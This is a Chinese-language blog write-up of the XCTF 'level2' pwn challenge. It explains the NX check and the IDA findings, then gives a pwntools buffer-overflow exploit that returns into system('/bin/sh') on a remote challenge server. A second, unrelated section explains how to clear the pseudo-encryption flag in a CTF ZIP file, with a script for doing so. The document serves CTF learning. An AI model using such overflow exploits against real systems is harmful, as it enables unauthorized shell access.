攻防世界_level2

checksec

在这里插入图片描述
checksec后发现开了NX,这就意味着栈中数据没有执行权限,但是可以利用rop这种方法绕过。最近再看蒸米大神的教程
一步一步学 ROP 之 Linux_x86 篇
一步一步学ROP之linux_x64篇

IDA

在这里插入图片描述
在这里插入图片描述

ida发现有个system函数,并在字符串窗口发现bin/sh
虽然学了linux,但还是不大明白这个,搜了一下Shell 教程。echo"Hello World!“就是一个最简单的shell脚本例子,”#!"是约定的标记,后面加所用的shell环境,这里是Bourne Shell(/usr/bin/sh或/bin/sh),实际Bourne Again Shell(/bin/bash)是最常用的。
在这里插入图片描述
找到ststem函数所在地址,_system 0x08048320
并非system 0x0804A038,从main函数直接跳转不会搞错
在这里插入图片描述
"bin/sh"字符串所在地址,0x0804A024
在这里插入图片描述
缓冲区0x88,允许读入0x100,存在缓冲区溢出。

exp

原来这个过程叫“构造rop链”,rop链攻击原理与思路(x86/x64)这个是20年的,算是比较新,没开始细看,大体还不错。
payload组成,参考攻防世界-iyzyi的wp,wp-上传者-iyzy
payload组成: 0x88个缓冲区字符,0x04个覆盖ebp地址的字符,覆写返回地址为system函数(system的栈帧中的ebp),p32(0)填充ebp+4,p32(bin_sh)自然就是system的参数(ebp+8)喽

from pwn import *

p = remote('111.200.241.244',58154)
#  0x88+0x04=0x8c  "bin/sh":0x0804A024  _system:0x08048320
payload = b'a' * 0x8c + p32(0x08048320) + p32(0) + p32(0x0804A024)
p.recvuntil("Input:")
p.send(payload)
p.interactive()

0x8c: 0x88+0x04=0x8c(十六进制),这个0x04是从vulnerable_function中的参数buf得来
p32,p64啥意思?
pwn从入门到放弃第四章——pwntools的基本使用教程pwntools还是要好好学学。
p32 p64:将一个数字转换为字符
u32 u64:将字符转换为数字
或者说p32、p64是打包为二进制,u32、u64是解包为二进制Pwn基础知识笔记
这里的p32是因为程序是32位的,p32(0)是因为_system的r也是要填上的(下面详细解释)
在这里插入图片描述
双击buf可以看到
在这里插入图片描述
拉到底,这里与level0中是相同的,r 是返回的地址,s是保存的寄存器
我的理解是 因为它存在溢出,先将栈填满,再把寄存器填满(这里寄存器就是ebp,eax也是一个寄存器,暂存ebp和buf的地址,然后push进栈)我们通过让这个栈满了
在这里插入图片描述
又因为函数返回要用 r,给 r 赋上咱们想让它到的地方的地址,这里让它返回到_system函数,
在这里插入图片描述
_system函数的 r 也是这样,不过这里的是0,也就是没有要返回的地址,p32(0)可以填充四位,到下面的command 运行shell “bin/sh” ,这样就可以拿到flag
在这里插入图片描述

flag

ls:列出文件和文件夹
cat:显示文件内容
linux基础: Linux基础入门(详细版)
在这里插入图片描述

### CTF 攻防世界 FakeZIP 挑战解题思路 #### 背景介绍 在 CTF 的杂项(Miscellaneous, MISC)类别中,`FakeZIP` 是一种常见的挑战形式。这类题目通常涉及分析带有伪加密标志的 ZIP 文件,并通过修改其十六进制编码来绕过所谓的“加密”。以下是针对 `攻防世界 - Misc - Level 1 | fakezip` 挑战的具体解题方法。 --- #### 技术背景与原理 ZIP 文件中的伪加密是一种特殊的标记机制,在文件头部分存在特定字段用于指示该文件是否被加密。然而,这种加密并非真正的数据保护手段,而仅仅是设置了某些位标志。如果这些标志被手动清除,则可以绕过密码验证过程直接访问文件内容[^2]。 具体来说: - **关键字段**:ZIP 文件头部结构中有几个重要的字节序列决定了文件的行为。 - **标志位作用**:当某个标志位设置为表示“已加密”的状态时,即使实际未执行任何加解密操作,程序仍会提示输入密码才能继续读取文件内容。 因此,解决此类问题的核心在于找到并更改这些控制行为的关键字节。 --- #### 工具准备 完成此任务需要用到以下工具之一来进行二进制编辑: - HxD (推荐初学者使用) - WinHex - 010 Editor 以上软件均支持直观显示文件内部原始数据流以及方便快捷地定位感兴趣区域进行修改。 --- #### 实际步骤解析 假设已经获取到了名为 `fake.zip` 的目标压缩包: 1. 使用任意一款前述提到的支持十六进制视图模式的应用加载待处理的目标档案; 2. 查找特征字符串 `50 4B 03 04`, 这代表标准本地文件头签名(Local File Header Signature)[^2]; 3. 定位到紧随上述签名字样之后的部分——即偏移量固定的位置处寻找可能存在的所谓‘加密’标签; 4. 修改相应位置上的数值由原本表明启用状态(`01`)改为关闭状态(`00`); 5. 对整个文档实施全局搜索确认是否存在其他相似情况重复上述动作直至全部调整完毕; 6. 存盘退出重新尝试开启原先受阻塞的资源应该能够顺利浏览其中所含项目无需再提供额外凭证信息. 7. 找到最终隐藏的信息片段比如图片等形式承载的有效负载提取出来解读得到预期的结果如FLAG串等。 ```python # 示例代码展示如何利用Python脚本批量替换指定字节值(仅作演示用途) def modify_zip(file_path): with open(file_path,"rb+") as f: data=f.read() # 寻找所有匹配'50 4B 03 04' index=0 while True: pos=data.find(b'\x50\x4b\x03\x04',index) if pos==-1:break enc_flag_pos=pos+6 # 加密旗标位于第7个字节 current_byte=data[enc_flag_pos] if(current_byte & 0x01)==0x01:# 如果最低有效位设定了则清零它 new_data=list(data) new_data[enc_flag_pos]&=~0x01 data=bytes(new_data) index+=len(b'\x50\x4b\x03\x04') with open(file_path,'wb')as wf: wf.write(data) if __name__=='__main__': import sys try: file=sys.argv[1] modify_zip(file) print(f"{file} has been modified successfully.") except Exception as e: print(e) ``` --- #### 结果验证 按照上述流程完成后,应能无障碍打开之前声称需密码解锁的那个假加密ZIP档,并从中取得埋藏好的线索资料例如图像之类的东西进而发掘出最后的答案格式形同于先前例子给出的标准样式:`flag{...}`[^1]. ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_JINJI_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值